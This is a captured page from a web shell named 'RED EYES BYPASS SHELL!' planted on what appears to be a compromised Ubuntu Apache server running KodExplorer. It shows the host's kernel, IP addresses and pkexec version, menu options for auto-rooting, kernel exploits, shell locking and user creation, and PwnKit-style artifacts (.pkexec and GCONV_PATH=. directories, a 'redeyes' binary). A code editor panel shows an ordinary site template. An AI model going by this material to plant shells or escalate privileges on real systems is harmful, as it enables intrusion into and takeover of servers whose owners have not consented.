Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
iqtd /
vendor /
admin /
app /
template /
common /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.red_eyes_root
0
B
-rw-r--r--
footer.html
986
B
-rwxr-xr-x
footerCommon.html
1.68
KB
-rwxr-xr-x
header.html
2.19
KB
-rwxr-xr-x
navbar.html
5.39
KB
-rwxr-xr-x
navbarShare.html
2.73
KB
-rwxr-xr-x
redeyes
10.99
KB
-rwxr-xr-x
showTips.html
3.08
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : navbarShare.html
<div class="full-background"></div> <div class="init-loading"><div> <img src="<?php echo STATIC_PATH;?>images/common/loading_simple.gif?v=<?php echo KOD_VERSION;?>"/></div> </div> <div class="topbar share-page-topbar"> <div class="content"> <div class="top-left"> <a href="./" class="topbar-menu title"> <?php if(substr(LNG('kod_name'),0,4) == '<img'){ echo LNG('kod_name'); }else{ echo '<i class="icon-cloud"></i>'.LNG('kod_name'); } ?> </a> <div class="share-info"> <span class="share-title"> <b class="share-title-info"> <?php clear_html($shareInfo['showName']);?> </b> </span> <span class="size"></span> <span class="time"></span> </div> <div style="clear:both;"></div> </div> <div class="top-right"> <div class="share-info-user hidden menu-group" style="z-index:9999;"> <span class="info"></span> <div class="btn-group"> <a type="button" class="btn btn-primary btn-download" target="_blank" href=""><?php echo LNG('download');?></a> </div> </div> <?php if(!isset($config['settings']['language'])){ ?> <div class="menu-group"> <a id='topbar-language' data-toggle="dropdown" href="#" class="topbar-menu"> <i class='font-icon icon-flag'></i> <b class="caret"></b> </a> <a href="#" onclick="core.qrcode(window.location.href);" title="<?php echo LNG('qrcode');?>" class="topbar-menu" style="padding: 0 15px;margin-left: -2px;"> <i class="font-icon icon-qrcode"></i> </a> <ul class="dropdown-menu topbar-language pull-right animated menuShow" role="menu" aria-labelledby="topbar-language"> <?php $tpl = ""; foreach ($config['settingAll']['language'] as $key => $value) { $name = $value[0]; $select = I18n::getType() == $key ? "this":""; $tpl .= "<li><a href='javascript:core.language(\"{$key}\");' title=\"{$key}/{$value[1]}/{$value[2]}\" class='{$select}'><i class='lang-flag flag-{$key}'></i>{$name}</a></li>"; } echo $tpl; ?> </ul> </div> <?php } ?> <div class="menu-group"> <a href="#" id='topbar-user' class="topbar-menu" data-toggle="dropdown"><i class="font-icon icon-user"></i><?php echo $_SESSION['kodUser']['name'];?> <b class="caret"></b></a> <ul class="dropdown-menu menu-topbar-user pull-right animated menuShow" role="menu" aria-labelledby="topbar-user"> <li><a href="#" onclick="core.fullScreen();"><i class="font-icon icon-fullscreen"></i><?php echo LNG('full_screen');?></a></li> <li class="version_vip_free"><a href="http://kodcloud.com" target="_blank"><i class="font-icon icon-code-fork"></i><?php echo LNG('ui_project_home');?></a></li> </ul> </div> </div> <div style="clear:both"></div> </div> </div>
Close